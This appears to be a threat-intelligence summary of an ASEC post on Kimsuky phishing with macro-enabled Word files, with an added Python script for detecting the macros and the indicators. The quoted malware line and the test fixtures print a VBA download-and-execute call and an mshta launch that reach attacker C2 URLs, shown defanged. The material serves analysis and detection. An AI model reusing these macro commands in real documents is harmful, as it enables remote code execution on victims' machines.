Word File Provided as External Link When Replying to Attacker’s Email (Kimsuky) – ASEC BLOG

ASEC has observed ongoing distribution of North Korea–related Word files used in Kimsuky campaigns, including variants that rely on mshta. Attackers impersonate Korean organizations to trigger a follow-up email with a link to download a malicious Word document that deploys macros and connects to a C2. Hashtags: #Kimsuky #NorthKorea #Mshta #WordMacros

Key points

  • Malicious Word files linked to North Korea-related activity (Kimsuky) are being distributed, including variants tied to AhnLab TIP and other NK-focused themes, with one type using mshta.
  • The campaign often starts with an impersonated sender from a Korean organization, followed by a reply containing a link to download a malicious Word file after the recipient expresses interest.
  • Type 1: A Word document contains a VBA macro that connects to a URL and attempts to download and execute additional content, including creating version.ini and invoking VBScript.
  • Type 2: A Word document uses mshta to reach C2, with macros prompting users to enable content and then executing further commands to reach additional URLs.
  • Opening the Word document prompts macro-enabled execution (Enable Content), making it harder for users to detect the malicious behavior.
  • IOCs include the hashes of the Word documents and several malicious URLs/domains used to fetch payloads and download the Word files.

MITRE Techniques

  • [T1566.001] Phishing – Spearphishing Link – The attacker impersonated a person from a Korean organization to send an email requesting a consultation for a report. Bracket quote: ‘The attacker impersonated a person from a Korean organization to send an email requesting a consultation for a report.’
  • [T1204.002] User Execution: Malicious File – Opening the Word file will show an image asking users to enable macros by clicking the Enable Content button. Bracket quote: ‘Opening the Word file will show an image asking users to enable macros by clicking the Enable Content button.’
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – The Word file contains a VBA macro that connects to a URL. Bracket quote: ‘The file contains a VBA macro that connects to a certain URL.’
  • [T1105] Ingress Tool Transfer – The macro downloads a payload from a URL via HTTP GET and executes the response body. Bracket quote: ‘Set mx = CreateObject("Microsoft.XMLHTTP"):mx.open "GET", "hxxp://asssambly.mywebcommunity[.]org/file/upload/list.php?query=1", False:mx.Send:Execute(mx.responseText)’
  • [T1218.005] Signed Binary Proxy Execution: Mshta – Type 2 uses mshta to reach C2. Bracket quote: ‘Type 2 is distributed with a file related to a specific webinar and accesses C2 through mshta.’

Indicators of Compromise

  • [File Name] – Consultation Request.doc, CV of Kim **(Korean American Organization of **,220711).doc
  • [Hash] – 357ef37979b02b08120895ae5175eb0a, 7fe055d5aa72bd50470da61985e12a8a
  • [Domain] – asssambly.mywebcommunity[.]org, freunkown1.sportsontheweb[.]net
  • [URL] – hxxp://asssambly.mywebcommunity[.]org/file/upload/list.php?query=1, hxxp://freunkown1.sportsontheweb[.]net/h.php
  • [URL] – hxxps://accounts.serviceprotect[.]eu/signin/v2/identifier?hl=kr&passive=true&<omitted>rtnurl=aHR0cHM6Ly9kb2NzLmdv<omitted>
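The following Python script is an added example (not ASEC code) that turns the MITRE techniques and the IOC list above into checks a defender can run: a handful of regex heuristics over a dumped VBA source (the XMLHTTP object, `Execute(…responseText)`, mshta, `version.ini`, auto-run entry points) and a lookup of the post's domains and MD5 hashes against a proxy log and a file-hash inventory. The IOC values are copied from the IOC list; the VBA fixtures, the proxy log lines and the function names are constructed for this example. The regexes are assumptions about what these macros look like in source form, not a reproduction of the samples.

```python
"""Detection helpers for the Kimsuky Word-macro indicators described above.

Added example, not ASEC code. Regexes are heuristics written for this post;
the IOC values are from the post's IOC list; the VBA and log samples are
constructed test fixtures, not captured data.
"""
import re
from typing import Dict, List

# Constructed fixture for Type 1: the XMLHTTP line is the one quoted in the
# post, kept defanged (hxxp, [.]) so it is inert; the Sub wrapper is filler.
SAMPLE_VBA_TYPE1 = '''Sub AutoOpen()
Set mx = CreateObject("Microsoft.XMLHTTP"):mx.open "GET", "hxxp://asssambly.mywebcommunity[.]org/file/upload/list.php?query=1", False:mx.Send:Execute(mx.responseText)
End Sub'''

# Constructed fixture for Type 2: only illustrates the mshta heuristic.
SAMPLE_VBA_TYPE2 = '''Sub Document_Open()
Shell "mshta hxxp://freunkown1.sportsontheweb[.]net/h.php"
End Sub'''

MACRO_RULES: Dict[str, "re.Pattern[str]"] = {
    # T1105: in-macro HTTP client object
    "xmlhttp_object": re.compile(r'CreateObject\s*\(\s*"(?:Microsoft|MSXML2)\.XMLHTTP', re.I),
    # T1059.005: executing whatever the server returned
    "execute_response": re.compile(r'\bExecute(?:Global)?\s*\(?\s*\w+\.responseText', re.I),
    # T1218.005: Type 2 reaches C2 through mshta
    "mshta_launch": re.compile(r'\bmshta(?:\.exe)?\b', re.I),
    # Type 1 writes version.ini before invoking VBScript
    "version_ini": re.compile(r'\bversion\.ini\b', re.I),
    # entry points that fire as soon as the user clicks Enable Content
    "auto_run": re.compile(r'\b(?:AutoOpen|Document_Open)\b', re.I),
}


def scan_vba(src: str) -> List[str]:
    """Return the names of the rules that fire on a VBA source dump."""
    return [name for name, rx in MACRO_RULES.items() if rx.search(src)]


def refang(indicator: str) -> str:
    """Turn a defanged IOC (hxxp, [.]) back into a value that matches logs."""
    return (indicator.replace("[.]", ".")
            .replace("hxxps://", "https://")
            .replace("hxxp://", "http://"))


# IOCs from the post, stored refanged and lower-cased for exact matching.
IOC_DOMAINS = {refang(d) for d in (
    "asssambly.mywebcommunity[.]org",
    "freunkown1.sportsontheweb[.]net",
    "accounts.serviceprotect[.]eu",
)}
IOC_MD5 = {"357ef37979b02b08120895ae5175eb0a", "7fe055d5aa72bd50470da61985e12a8a"}

# Constructed proxy log: "<timestamp> <client ip> <host> <path>"
SAMPLE_PROXY_LOG = """2022-07-11T09:01:02Z 10.0.0.5 update.example.net /ok
2022-07-11T09:02:17Z 10.0.0.5 asssambly.mywebcommunity.org /file/upload/list.php?query=1
2022-07-11T09:02:40Z 10.0.0.7 freunkown1.sportsontheweb.net /h.php
2022-07-11T09:03:00Z 10.0.0.9 accounts.serviceprotect.eu /signin/v2/identifier"""


def match_proxy_log(log: str) -> List[Dict[str, str]]:
    """Return one record per log line whose host is on the IOC domain list."""
    hits: List[Dict[str, str]] = []
    for line in log.splitlines():
        parts = line.split(maxsplit=3)
        if len(parts) < 4:
            continue  # skip malformed lines rather than crash the sweep
        ts, client, host, path = parts
        if host.lower() in IOC_DOMAINS:
            hits.append({"ts": ts, "client": client, "host": host, "path": path})
    return hits


def flag_hashes(observed: Dict[str, str]) -> List[str]:
    """Given {filename: md5}, return the filenames whose hash is an IOC."""
    return [name for name, md5 in observed.items() if md5.lower() in IOC_MD5]


if __name__ == "__main__":
    print("type1 rules:", scan_vba(SAMPLE_VBA_TYPE1))
    print("type2 rules:", scan_vba(SAMPLE_VBA_TYPE2))
    for hit in match_proxy_log(SAMPLE_PROXY_LOG):
        print("proxy hit:", hit)
```

The macro rules are deliberately independent: a single hit such as `auto_run` is common in benign documents, so treat the combination (`auto_run` plus `xmlhttp_object` plus `execute_response`) as the signal, and keep the domain and hash matches as exact lookups, since those are the only values the post confirms.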

Read more: https://asec.ahnlab.com/en/37396/